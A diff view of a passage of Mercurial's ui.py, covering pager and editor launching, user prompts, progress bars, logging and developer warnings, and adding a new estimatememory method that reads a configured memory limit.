1320 1320 if not command.startswith(b'internal-always-') and (
1321 1321 # explicit --pager=on (= 'internal-always-' prefix) should
1322 1322 # take precedence over disabling factors below
1323 1323 command in self.configlist(b'pager', b'ignore')
1324 1324 or not self.configbool(b'ui', b'paginate')
1325 1325 or not self.configbool(b'pager', b'attend-' + command, True)
1326 1326 or encoding.environ.get(b'TERM') == b'dumb'
1327 1327 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1328 1328 # formatted() will need some adjustment.
1329 1329 or not self.formatted()
1330 1330 or self.plain()
1331 1331 or self._buffers
1332 1332 # TODO: expose debugger-enabled on the UI object
1333 1333 or b'--debugger' in pycompat.sysargv
1334 1334 ):
1335 1335 # We only want to paginate if the ui appears to be
1336 1336 # interactive, the user didn't say HGPLAIN or
1337 1337 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1338 1338 return
1339 1339
1340 1340 pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
1341 1341 if not pagercmd:
1342 1342 return
1343 1343
1344 1344 pagerenv = {}
1345 1345 for name, value in rcutil.defaultpagerenv().items():
1346 1346 if name not in encoding.environ:
1347 1347 pagerenv[name] = value
1348 1348
1349 1349 self.debug(
1350 1350 b'starting pager for command %s\n' % stringutil.pprint(command)
1351 1351 )
1352 1352 self.flush()
1353 1353
1354 1354 wasformatted = self.formatted()
1355 1355 if util.safehasattr(signal, b"SIGPIPE"):
1356 1356 signal.signal(signal.SIGPIPE, _catchterm)
1357 1357 if self._runpager(pagercmd, pagerenv):
1358 1358 self.pageractive = True
1359 1359 # Preserve the formatted-ness of the UI. This is important
1360 1360 # because we mess with stdout, which might confuse
1361 1361 # auto-detection of things being formatted.
1362 1362 self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
1363 1363 self.setconfig(b'ui', b'interactive', False, b'pager')
1364 1364
1365 1365 # If pagermode differs from color.mode, reconfigure color now that
1366 1366 # pageractive is set.
1367 1367 cm = self._colormode
1368 1368 if cm != self.config(b'color', b'pagermode', cm):
1369 1369 color.setup(self)
1370 1370 else:
1371 1371 # If the pager can't be spawned in dispatch when --pager=on is
1372 1372 # given, don't try again when the command runs, to avoid a duplicate
1373 1373 # warning about a missing pager command.
1374 1374 self.disablepager()
1375 1375
1376 1376 def _runpager(self, command, env=None):
1377 1377 """Actually start the pager and set up file descriptors.
1378 1378
1379 1379 This is separate in part so that extensions (like chg) can
1380 1380 override how a pager is invoked.
1381 1381 """
1382 1382 if command == b'cat':
1383 1383 # Save ourselves some work.
1384 1384 return False
1385 1385 # If the command doesn't contain any of these characters, we
1386 1386 # assume it's a binary and exec it directly. This means for
1387 1387 # simple pager command configurations, we can degrade
1388 1388 # gracefully and tell the user about their broken pager.
1389 1389 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1390 1390
1391 1391 if pycompat.iswindows and not shell:
1392 1392 # Window's built-in `more` cannot be invoked with shell=False, but
1393 1393 # its `more.com` can. Hide this implementation detail from the
1394 1394 # user so we can also get sane bad PAGER behavior. MSYS has
1395 1395 # `more.exe`, so do a cmd.exe style resolution of the executable to
1396 1396 # determine which one to use.
1397 1397 fullcmd = procutil.findexe(command)
1398 1398 if not fullcmd:
1399 1399 self.warn(
1400 1400 _(b"missing pager command '%s', skipping pager\n") % command
1401 1401 )
1402 1402 return False
1403 1403
1404 1404 command = fullcmd
1405 1405
1406 1406 try:
1407 1407 pager = subprocess.Popen(
1408 1408 procutil.tonativestr(command),
1409 1409 shell=shell,
1410 1410 bufsize=-1,
1411 1411 close_fds=procutil.closefds,
1412 1412 stdin=subprocess.PIPE,
1413 1413 stdout=procutil.stdout,
1414 1414 stderr=procutil.stderr,
1415 1415 env=procutil.tonativeenv(procutil.shellenviron(env)),
1416 1416 )
1417 1417 except OSError as e:
1418 1418 if e.errno == errno.ENOENT and not shell:
1419 1419 self.warn(
1420 1420 _(b"missing pager command '%s', skipping pager\n") % command
1421 1421 )
1422 1422 return False
1423 1423 raise
1424 1424
1425 1425 # back up original file descriptors
1426 1426 stdoutfd = os.dup(procutil.stdout.fileno())
1427 1427 stderrfd = os.dup(procutil.stderr.fileno())
1428 1428
1429 1429 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1430 1430 if self._isatty(procutil.stderr):
1431 1431 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1432 1432
1433 1433 @self.atexit
1434 1434 def killpager():
1435 1435 if util.safehasattr(signal, b"SIGINT"):
1436 1436 signal.signal(signal.SIGINT, signal.SIG_IGN)
1437 1437 # restore original fds, closing pager.stdin copies in the process
1438 1438 os.dup2(stdoutfd, procutil.stdout.fileno())
1439 1439 os.dup2(stderrfd, procutil.stderr.fileno())
1440 1440 pager.stdin.close()
1441 1441 pager.wait()
1442 1442
1443 1443 return True
1444 1444
1445 1445 @property
1446 1446 def _exithandlers(self):
1447 1447 return _reqexithandlers
1448 1448
1449 1449 def atexit(self, func, *args, **kwargs):
1450 1450 '''register a function to run after dispatching a request
1451 1451
1452 1452 Handlers do not stay registered across request boundaries.'''
1453 1453 self._exithandlers.append((func, args, kwargs))
1454 1454 return func
1455 1455
1456 1456 def interface(self, feature):
1457 1457 """what interface to use for interactive console features?
1458 1458
1459 1459 The interface is controlled by the value of `ui.interface` but also by
1460 1460 the value of feature-specific configuration. For example:
1461 1461
1462 1462 ui.interface.histedit = text
1463 1463 ui.interface.chunkselector = curses
1464 1464
1465 1465 Here the features are "histedit" and "chunkselector".
1466 1466
1467 1467 The configuration above means that the default interfaces for commands
1468 1468 is curses, the interface for histedit is text and the interface for
1469 1469 selecting chunk is crecord (the best curses interface available).
1470 1470
1471 1471 Consider the following example:
1472 1472 ui.interface = curses
1473 1473 ui.interface.histedit = text
1474 1474
1475 1475 Then histedit will use the text interface and chunkselector will use
1476 1476 the default curses interface (crecord at the moment).
1477 1477 """
1478 1478 alldefaults = frozenset([b"text", b"curses"])
1479 1479
1480 1480 featureinterfaces = {
1481 1481 b"chunkselector": [b"text", b"curses",],
1482 1482 b"histedit": [b"text", b"curses",],
1483 1483 }
1484 1484
1485 1485 # Feature-specific interface
1486 1486 if feature not in featureinterfaces.keys():
1487 1487 # Programming error, not user error
1488 1488 raise ValueError(b"Unknown feature requested %s" % feature)
1489 1489
1490 1490 availableinterfaces = frozenset(featureinterfaces[feature])
1491 1491 if alldefaults > availableinterfaces:
1492 1492 # Programming error, not user error. We need a use case to
1493 1493 # define the right thing to do here.
1494 1494 raise ValueError(
1495 1495 b"Feature %s does not handle all default interfaces" % feature
1496 1496 )
1497 1497
1498 1498 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1499 1499 return b"text"
1500 1500
1501 1501 # Default interface for all the features
1502 1502 defaultinterface = b"text"
1503 1503 i = self.config(b"ui", b"interface")
1504 1504 if i in alldefaults:
1505 1505 defaultinterface = i
1506 1506
1507 1507 choseninterface = defaultinterface
1508 1508 f = self.config(b"ui", b"interface.%s" % feature)
1509 1509 if f in availableinterfaces:
1510 1510 choseninterface = f
1511 1511
1512 1512 if i is not None and defaultinterface != i:
1513 1513 if f is not None:
1514 1514 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1515 1515 else:
1516 1516 self.warn(
1517 1517 _(b"invalid value for ui.interface: %s (using %s)\n")
1518 1518 % (i, choseninterface)
1519 1519 )
1520 1520 if f is not None and choseninterface != f:
1521 1521 self.warn(
1522 1522 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1523 1523 % (feature, f, choseninterface)
1524 1524 )
1525 1525
1526 1526 return choseninterface
1527 1527
1528 1528 def interactive(self):
1529 1529 '''is interactive input allowed?
1530 1530
1531 1531 An interactive session is a session where input can be reasonably read
1532 1532 from `sys.stdin'. If this function returns false, any attempt to read
1533 1533 from stdin should fail with an error, unless a sensible default has been
1534 1534 specified.
1535 1535
1536 1536 Interactiveness is triggered by the value of the `ui.interactive'
1537 1537 configuration variable or - if it is unset - when `sys.stdin' points
1538 1538 to a terminal device.
1539 1539
1540 1540 This function refers to input only; for output, see `ui.formatted()'.
1541 1541 '''
1542 1542 i = self.configbool(b"ui", b"interactive")
1543 1543 if i is None:
1544 1544 # some environments replace stdin without implementing isatty
1545 1545 # usually those are non-interactive
1546 1546 return self._isatty(self._fin)
1547 1547
1548 1548 return i
1549 1549
1550 1550 def termwidth(self):
1551 1551 '''how wide is the terminal in columns?
1552 1552 '''
1553 1553 if b'COLUMNS' in encoding.environ:
1554 1554 try:
1555 1555 return int(encoding.environ[b'COLUMNS'])
1556 1556 except ValueError:
1557 1557 pass
1558 1558 return scmutil.termsize(self)[0]
1559 1559
1560 1560 def formatted(self):
1561 1561 '''should formatted output be used?
1562 1562
1563 1563 It is often desirable to format the output to suite the output medium.
1564 1564 Examples of this are truncating long lines or colorizing messages.
1565 1565 However, this is not often not desirable when piping output into other
1566 1566 utilities, e.g. `grep'.
1567 1567
1568 1568 Formatted output is triggered by the value of the `ui.formatted'
1569 1569 configuration variable or - if it is unset - when `sys.stdout' points
1570 1570 to a terminal device. Please note that `ui.formatted' should be
1571 1571 considered an implementation detail; it is not intended for use outside
1572 1572 Mercurial or its extensions.
1573 1573
1574 1574 This function refers to output only; for input, see `ui.interactive()'.
1575 1575 This function always returns false when in plain mode, see `ui.plain()'.
1576 1576 '''
1577 1577 if self.plain():
1578 1578 return False
1579 1579
1580 1580 i = self.configbool(b"ui", b"formatted")
1581 1581 if i is None:
1582 1582 # some environments replace stdout without implementing isatty
1583 1583 # usually those are non-interactive
1584 1584 return self._isatty(self._fout)
1585 1585
1586 1586 return i
1587 1587
1588 1588 def _readline(self, prompt=b' ', promptopts=None):
1589 1589 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1590 1590 # because they have to be text streams with *no buffering*. Instead,
1591 1591 # we use rawinput() only if call_readline() will be invoked by
1592 1592 # PyOS_Readline(), so no I/O will be made at Python layer.
1593 1593 usereadline = (
1594 1594 self._isatty(self._fin)
1595 1595 and self._isatty(self._fout)
1596 1596 and procutil.isstdin(self._fin)
1597 1597 and procutil.isstdout(self._fout)
1598 1598 )
1599 1599 if usereadline:
1600 1600 try:
1601 1601 # magically add command line editing support, where
1602 1602 # available
1603 1603 import readline
1604 1604
1605 1605 # force demandimport to really load the module
1606 1606 readline.read_history_file
1607 1607 # windows sometimes raises something other than ImportError
1608 1608 except Exception:
1609 1609 usereadline = False
1610 1610
1611 1611 if self._colormode == b'win32' or not usereadline:
1612 1612 if not promptopts:
1613 1613 promptopts = {}
1614 1614 self._writemsgnobuf(
1615 1615 self._fmsgout, prompt, type=b'prompt', **promptopts
1616 1616 )
1617 1617 self.flush()
1618 1618 prompt = b' '
1619 1619 else:
1620 1620 prompt = self.label(prompt, b'ui.prompt') + b' '
1621 1621
1622 1622 # prompt ' ' must exist; otherwise readline may delete entire line
1623 1623 # - http://bugs.python.org/issue12833
1624 1624 with self.timeblockedsection(b'stdio'):
1625 1625 if usereadline:
1626 1626 self.flush()
1627 1627 prompt = encoding.strfromlocal(prompt)
1628 1628 line = encoding.strtolocal(pycompat.rawinput(prompt))
1629 1629 # When stdin is in binary mode on Windows, it can cause
1630 1630 # raw_input() to emit an extra trailing carriage return
1631 1631 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1632 1632 line = line[:-1]
1633 1633 else:
1634 1634 self._fout.write(pycompat.bytestr(prompt))
1635 1635 self._fout.flush()
1636 1636 line = self._fin.readline()
1637 1637 if not line:
1638 1638 raise EOFError
1639 1639 line = line.rstrip(pycompat.oslinesep)
1640 1640
1641 1641 return line
1642 1642
1643 1643 def prompt(self, msg, default=b"y"):
1644 1644 """Prompt user with msg, read response.
1645 1645 If ui is not interactive, the default is returned.
1646 1646 """
1647 1647 return self._prompt(msg, default=default)
1648 1648
1649 1649 def _prompt(self, msg, **opts):
1650 1650 default = opts['default']
1651 1651 if not self.interactive():
1652 1652 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1653 1653 self._writemsg(
1654 1654 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1655 1655 )
1656 1656 return default
1657 1657 try:
1658 1658 r = self._readline(prompt=msg, promptopts=opts)
1659 1659 if not r:
1660 1660 r = default
1661 1661 if self.configbool(b'ui', b'promptecho'):
1662 1662 self._writemsg(self._fmsgout, r, b"\n", type=b'promptecho')
1663 1663 return r
1664 1664 except EOFError:
1665 1665 raise error.ResponseExpected()
1666 1666
1667 1667 @staticmethod
1668 1668 def extractchoices(prompt):
1669 1669 """Extract prompt message and list of choices from specified prompt.
1670 1670
1671 1671 This returns tuple "(message, choices)", and "choices" is the
1672 1672 list of tuple "(response character, text without &)".
1673 1673
1674 1674 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1675 1675 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1676 1676 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1677 1677 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1678 1678 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1679 1679 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1680 1680 """
1681 1681
1682 1682 # Sadly, the prompt string may have been built with a filename
1683 1683 # containing "$$" so let's try to find the first valid-looking
1684 1684 # prompt to start parsing. Sadly, we also can't rely on
1685 1685 # choices containing spaces, ASCII, or basically anything
1686 1686 # except an ampersand followed by a character.
1687 1687 m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
1688 1688 msg = m.group(1)
1689 1689 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1690 1690
1691 1691 def choicetuple(s):
1692 1692 ampidx = s.index(b'&')
1693 1693 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1694 1694
1695 1695 return (msg, [choicetuple(s) for s in choices])
1696 1696
1697 1697 def promptchoice(self, prompt, default=0):
1698 1698 """Prompt user with a message, read response, and ensure it matches
1699 1699 one of the provided choices. The prompt is formatted as follows:
1700 1700
1701 1701 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1702 1702
1703 1703 The index of the choice is returned. Responses are case
1704 1704 insensitive. If ui is not interactive, the default is
1705 1705 returned.
1706 1706 """
1707 1707
1708 1708 msg, choices = self.extractchoices(prompt)
1709 1709 resps = [r for r, t in choices]
1710 1710 while True:
1711 1711 r = self._prompt(msg, default=resps[default], choices=choices)
1712 1712 if r.lower() in resps:
1713 1713 return resps.index(r.lower())
1714 1714 # TODO: shouldn't it be a warning?
1715 1715 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1716 1716
1717 1717 def getpass(self, prompt=None, default=None):
1718 1718 if not self.interactive():
1719 1719 return default
1720 1720 try:
1721 1721 self._writemsg(
1722 1722 self._fmsgerr,
1723 1723 prompt or _(b'password: '),
1724 1724 type=b'prompt',
1725 1725 password=True,
1726 1726 )
1727 1727 # disable getpass() only if explicitly specified. it's still valid
1728 1728 # to interact with tty even if fin is not a tty.
1729 1729 with self.timeblockedsection(b'stdio'):
1730 1730 if self.configbool(b'ui', b'nontty'):
1731 1731 l = self._fin.readline()
1732 1732 if not l:
1733 1733 raise EOFError
1734 1734 return l.rstrip(b'\n')
1735 1735 else:
1736 1736 return getpass.getpass('')
1737 1737 except EOFError:
1738 1738 raise error.ResponseExpected()
1739 1739
1740 1740 def status(self, *msg, **opts):
1741 1741 '''write status message to output (if ui.quiet is False)
1742 1742
1743 1743 This adds an output label of "ui.status".
1744 1744 '''
1745 1745 if not self.quiet:
1746 1746 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1747 1747
1748 1748 def warn(self, *msg, **opts):
1749 1749 '''write warning message to output (stderr)
1750 1750
1751 1751 This adds an output label of "ui.warning".
1752 1752 '''
1753 1753 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1754 1754
1755 1755 def error(self, *msg, **opts):
1756 1756 '''write error message to output (stderr)
1757 1757
1758 1758 This adds an output label of "ui.error".
1759 1759 '''
1760 1760 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1761 1761
1762 1762 def note(self, *msg, **opts):
1763 1763 '''write note to output (if ui.verbose is True)
1764 1764
1765 1765 This adds an output label of "ui.note".
1766 1766 '''
1767 1767 if self.verbose:
1768 1768 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1769 1769
1770 1770 def debug(self, *msg, **opts):
1771 1771 '''write debug message to output (if ui.debugflag is True)
1772 1772
1773 1773 This adds an output label of "ui.debug".
1774 1774 '''
1775 1775 if self.debugflag:
1776 1776 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1777 1777 self.log(b'debug', b'%s', b''.join(msg))
1778 1778
1779 1779 # Aliases to defeat check-code.
1780 1780 statusnoi18n = status
1781 1781 notenoi18n = note
1782 1782 warnnoi18n = warn
1783 1783 writenoi18n = write
1784 1784
1785 1785 def edit(
1786 1786 self,
1787 1787 text,
1788 1788 user,
1789 1789 extra=None,
1790 1790 editform=None,
1791 1791 pending=None,
1792 1792 repopath=None,
1793 1793 action=None,
1794 1794 ):
1795 1795 if action is None:
1796 1796 self.develwarn(
1797 1797 b'action is None but will soon be a required '
1798 1798 b'parameter to ui.edit()'
1799 1799 )
1800 1800 extra_defaults = {
1801 1801 b'prefix': b'editor',
1802 1802 b'suffix': b'.txt',
1803 1803 }
1804 1804 if extra is not None:
1805 1805 if extra.get(b'suffix') is not None:
1806 1806 self.develwarn(
1807 1807 b'extra.suffix is not None but will soon be '
1808 1808 b'ignored by ui.edit()'
1809 1809 )
1810 1810 extra_defaults.update(extra)
1811 1811 extra = extra_defaults
1812 1812
1813 1813 if action == b'diff':
1814 1814 suffix = b'.diff'
1815 1815 elif action:
1816 1816 suffix = b'.%s.hg.txt' % action
1817 1817 else:
1818 1818 suffix = extra[b'suffix']
1819 1819
1820 1820 rdir = None
1821 1821 if self.configbool(b'experimental', b'editortmpinhg'):
1822 1822 rdir = repopath
1823 1823 (fd, name) = pycompat.mkstemp(
1824 1824 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1825 1825 )
1826 1826 try:
1827 1827 with os.fdopen(fd, 'wb') as f:
1828 1828 f.write(util.tonativeeol(text))
1829 1829
1830 1830 environ = {b'HGUSER': user}
1831 1831 if b'transplant_source' in extra:
1832 1832 environ.update(
1833 1833 {b'HGREVISION': hex(extra[b'transplant_source'])}
1834 1834 )
1835 1835 for label in (b'intermediate-source', b'source', b'rebase_source'):
1836 1836 if label in extra:
1837 1837 environ.update({b'HGREVISION': extra[label]})
1838 1838 break
1839 1839 if editform:
1840 1840 environ.update({b'HGEDITFORM': editform})
1841 1841 if pending:
1842 1842 environ.update({b'HG_PENDING': pending})
1843 1843
1844 1844 editor = self.geteditor()
1845 1845
1846 1846 self.system(
1847 1847 b"%s \"%s\"" % (editor, name),
1848 1848 environ=environ,
1849 1849 onerr=error.Abort,
1850 1850 errprefix=_(b"edit failed"),
1851 1851 blockedtag=b'editor',
1852 1852 )
1853 1853
1854 1854 with open(name, 'rb') as f:
1855 1855 t = util.fromnativeeol(f.read())
1856 1856 finally:
1857 1857 os.unlink(name)
1858 1858
1859 1859 return t
1860 1860
1861 1861 def system(
1862 1862 self,
1863 1863 cmd,
1864 1864 environ=None,
1865 1865 cwd=None,
1866 1866 onerr=None,
1867 1867 errprefix=None,
1868 1868 blockedtag=None,
1869 1869 ):
1870 1870 '''execute shell command with appropriate output stream. command
1871 1871 output will be redirected if fout is not stdout.
1872 1872
1873 1873 if command fails and onerr is None, return status, else raise onerr
1874 1874 object as exception.
1875 1875 '''
1876 1876 if blockedtag is None:
1877 1877 # Long cmds tend to be because of an absolute path on cmd. Keep
1878 1878 # the tail end instead
1879 1879 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1880 1880 blockedtag = b'unknown_system_' + cmdsuffix
1881 1881 out = self._fout
1882 1882 if any(s[1] for s in self._bufferstates):
1883 1883 out = self
1884 1884 with self.timeblockedsection(blockedtag):
1885 1885 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1886 1886 if rc and onerr:
1887 1887 errmsg = b'%s %s' % (
1888 1888 procutil.shellsplit(cmd)[0],
1889 1889 procutil.explainexit(rc),
1890 1890 )
1891 1891 if errprefix:
1892 1892 errmsg = b'%s: %s' % (errprefix, errmsg)
1893 1893 raise onerr(errmsg)
1894 1894 return rc
1895 1895
1896 1896 def _runsystem(self, cmd, environ, cwd, out):
1897 1897 """actually execute the given shell command (can be overridden by
1898 1898 extensions like chg)"""
1899 1899 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1900 1900
1901 1901 def traceback(self, exc=None, force=False):
1902 1902 '''print exception traceback if traceback printing enabled or forced.
1903 1903 only to call in exception handler. returns true if traceback
1904 1904 printed.'''
1905 1905 if self.tracebackflag or force:
1906 1906 if exc is None:
1907 1907 exc = sys.exc_info()
1908 1908 cause = getattr(exc[1], 'cause', None)
1909 1909
1910 1910 if cause is not None:
1911 1911 causetb = traceback.format_tb(cause[2])
1912 1912 exctb = traceback.format_tb(exc[2])
1913 1913 exconly = traceback.format_exception_only(cause[0], cause[1])
1914 1914
1915 1915 # exclude frame where 'exc' was chained and rethrown from exctb
1916 1916 self.write_err(
1917 1917 b'Traceback (most recent call last):\n',
1918 1918 encoding.strtolocal(''.join(exctb[:-1])),
1919 1919 encoding.strtolocal(''.join(causetb)),
1920 1920 encoding.strtolocal(''.join(exconly)),
1921 1921 )
1922 1922 else:
1923 1923 output = traceback.format_exception(exc[0], exc[1], exc[2])
1924 1924 self.write_err(encoding.strtolocal(''.join(output)))
1925 1925 return self.tracebackflag or force
1926 1926
1927 1927 def geteditor(self):
1928 1928 '''return editor to use'''
1929 1929 if pycompat.sysplatform == b'plan9':
1930 1930 # vi is the MIPS instruction simulator on Plan 9. We
1931 1931 # instead default to E to plumb commit messages to
1932 1932 # avoid confusion.
1933 1933 editor = b'E'
1934 1934 elif pycompat.isdarwin:
1935 1935 # vi on darwin is POSIX compatible to a fault, and that includes
1936 1936 # exiting non-zero if you make any mistake when running an ex
1937 1937 # command. Proof: `vi -c ':unknown' -c ':qa'; echo $?` produces 1,
1938 1938 # while s/vi/vim/ doesn't.
1939 1939 editor = b'vim'
1940 1940 else:
1941 1941 editor = b'vi'
1942 1942 return encoding.environ.get(b"HGEDITOR") or self.config(
1943 1943 b"ui", b"editor", editor
1944 1944 )
1945 1945
1946 1946 @util.propertycache
1947 1947 def _progbar(self):
1948 1948 """setup the progbar singleton to the ui object"""
1949 1949 if (
1950 1950 self.quiet
1951 1951 or self.debugflag
1952 1952 or self.configbool(b'progress', b'disable')
1953 1953 or not progress.shouldprint(self)
1954 1954 ):
1955 1955 return None
1956 1956 return getprogbar(self)
1957 1957
1958 1958 def _progclear(self):
1959 1959 """clear progress bar output if any. use it before any output"""
1960 1960 if not haveprogbar(): # nothing loaded yet
1961 1961 return
1962 1962 if self._progbar is not None and self._progbar.printed:
1963 1963 self._progbar.clear()
1964 1964
1965 1965 def makeprogress(self, topic, unit=b"", total=None):
1966 1966 """Create a progress helper for the specified topic"""
1967 1967 if getattr(self._fmsgerr, 'structured', False):
1968 1968 # channel for machine-readable output with metadata, just send
1969 1969 # raw information
1970 1970 # TODO: consider porting some useful information (e.g. estimated
1971 1971 # time) from progbar. we might want to support update delay to
1972 1972 # reduce the cost of transferring progress messages.
1973 1973 def updatebar(topic, pos, item, unit, total):
1974 1974 self._fmsgerr.write(
1975 1975 None,
1976 1976 type=b'progress',
1977 1977 topic=topic,
1978 1978 pos=pos,
1979 1979 item=item,
1980 1980 unit=unit,
1981 1981 total=total,
1982 1982 )
1983 1983
1984 1984 elif self._progbar is not None:
1985 1985 updatebar = self._progbar.progress
1986 1986 else:
1987 1987
1988 1988 def updatebar(topic, pos, item, unit, total):
1989 1989 pass
1990 1990
1991 1991 return scmutil.progress(self, updatebar, topic, unit, total)
1992 1992
1993 1993 def getlogger(self, name):
1994 1994 """Returns a logger of the given name; or None if not registered"""
1995 1995 return self._loggers.get(name)
1996 1996
1997 1997 def setlogger(self, name, logger):
1998 1998 """Install logger which can be identified later by the given name
1999 1999
2000 2000 More than one loggers can be registered. Use extension or module
2001 2001 name to uniquely identify the logger instance.
2002 2002 """
2003 2003 self._loggers[name] = logger
2004 2004
2005 2005 def log(self, event, msgfmt, *msgargs, **opts):
2006 2006 '''hook for logging facility extensions
2007 2007
2008 2008 event should be a readily-identifiable subsystem, which will
2009 2009 allow filtering.
2010 2010
2011 2011 msgfmt should be a newline-terminated format string to log, and
2012 2012 *msgargs are %-formatted into it.
2013 2013
2014 2014 **opts currently has no defined meanings.
2015 2015 '''
2016 2016 if not self._loggers:
2017 2017 return
2018 2018 activeloggers = [
2019 2019 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
2020 2020 ]
2021 2021 if not activeloggers:
2022 2022 return
2023 2023 msg = msgfmt % msgargs
2024 2024 opts = pycompat.byteskwargs(opts)
2025 2025 # guard against recursion from e.g. ui.debug()
2026 2026 registeredloggers = self._loggers
2027 2027 self._loggers = {}
2028 2028 try:
2029 2029 for logger in activeloggers:
2030 2030 logger.log(self, event, msg, opts)
2031 2031 finally:
2032 2032 self._loggers = registeredloggers
2033 2033
2034 2034 def label(self, msg, label):
2035 2035 '''style msg based on supplied label
2036 2036
2037 2037 If some color mode is enabled, this will add the necessary control
2038 2038 characters to apply such color. In addition, 'debug' color mode adds
2039 2039 markup showing which label affects a piece of text.
2040 2040
2041 2041 ui.write(s, 'label') is equivalent to
2042 2042 ui.write(ui.label(s, 'label')).
2043 2043 '''
2044 2044 if self._colormode is not None:
2045 2045 return color.colorlabel(self, msg, label)
2046 2046 return msg
2047 2047
2048 2048 def develwarn(self, msg, stacklevel=1, config=None):
2049 2049 """issue a developer warning message
2050 2050
2051 2051 Use 'stacklevel' to report the offender some layers further up in the
2052 2052 stack.
2053 2053 """
2054 2054 if not self.configbool(b'devel', b'all-warnings'):
2055 2055 if config is None or not self.configbool(b'devel', config):
2056 2056 return
2057 2057 msg = b'devel-warn: ' + msg
2058 2058 stacklevel += 1 # get in develwarn
2059 2059 if self.tracebackflag:
2060 2060 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2061 2061 self.log(
2062 2062 b'develwarn',
2063 2063 b'%s at:\n%s'
2064 2064 % (msg, b''.join(util.getstackframes(stacklevel))),
2065 2065 )
2066 2066 else:
2067 2067 curframe = inspect.currentframe()
2068 2068 calframe = inspect.getouterframes(curframe, 2)
2069 2069 fname, lineno, fmsg = calframe[stacklevel][1:4]
2070 2070 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2071 2071 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2072 2072 self.log(
2073 2073 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2074 2074 )
2075 2075
2076 2076 # avoid cycles
2077 2077 del curframe
2078 2078 del calframe
2079 2079
2080 2080 def deprecwarn(self, msg, version, stacklevel=2):
2081 2081 """issue a deprecation warning
2082 2082
2083 2083 - msg: message explaining what is deprecated and how to upgrade,
2084 2084 - version: last version where the API will be supported,
2085 2085 """
2086 2086 if not (
2087 2087 self.configbool(b'devel', b'all-warnings')
2088 2088 or self.configbool(b'devel', b'deprec-warn')
2089 2089 ):
2090 2090 return
2091 2091 msg += (
2092 2092 b"\n(compatibility will be dropped after Mercurial-%s,"
2093 2093 b" update your code.)"
2094 2094 ) % version
2095 2095 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2096 2096
2097 2097 def exportableenviron(self):
2098 2098 """The environment variables that are safe to export, e.g. through
2099 2099 hgweb.
2100 2100 """
2101 2101 return self._exportableenviron
2102 2102
2103 2103 @contextlib.contextmanager
2104 2104 def configoverride(self, overrides, source=b""):
2105 2105 """Context manager for temporary config overrides
2106 2106 `overrides` must be a dict of the following structure:
2107 2107 {(section, name) : value}"""
2108 2108 backups = {}
2109 2109 try:
2110 2110 for (section, name), value in overrides.items():
2111 2111 backups[(section, name)] = self.backupconfig(section, name)
2112 2112 self.setconfig(section, name, value, source)
2113 2113 yield
2114 2114 finally:
2115 2115 for __, backup in backups.items():
2116 2116 self.restoreconfig(backup)
2117 2117 # just restoring ui.quiet config to the previous value is not enough
2118 2118 # as it does not update ui.quiet class member
2119 2119 if (b'ui', b'quiet') in overrides:
2120 2120 self.fixconfig(section=b'ui')
2121 2121
2122 def estimatememory(self):
2123 """Provide an estimate for the available system memory in Bytes.
2124
2125 This can be overriden via ui.available-memory. It returns None, if
2126 no estimate can be computed.
2127 """
2128 value = self.config(b'ui', b'available-memory')
2129 if value is not None:
2130 try:
2131 return util.sizetoint(value)
2132 except error.ParseError:
2133 raise error.ConfigError(
2134 _(b"ui.available-memory value is invalid ('%s')") % value
2135 )
2136 return util._estimatememory()
2137
2122 2138
2123 2139 class paths(dict):
2124 2140 """Represents a collection of paths and their configs.
2125 2141
2126 2142 Data is initially derived from ui instances and the config files they have
2127 2143 loaded.
2128 2144 """
2129 2145
2130 2146 def __init__(self, ui):
2131 2147 dict.__init__(self)
2132 2148
2133 2149 for name, loc in ui.configitems(b'paths', ignoresub=True):
2134 2150 # No location is the same as not existing.
2135 2151 if not loc:
2136 2152 continue
2137 2153 loc, sub = ui.configsuboptions(b'paths', name)
2138 2154 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
2139 2155
2140 2156 def getpath(self, name, default=None):
2141 2157 """Return a ``path`` from a string, falling back to default.
2142 2158
2143 2159 ``name`` can be a named path or locations. Locations are filesystem
2144 2160 paths or URIs.
2145 2161
2146 2162 Returns None if ``name`` is not a registered path, a URI, or a local
2147 2163 path to a repo.
2148 2164 """
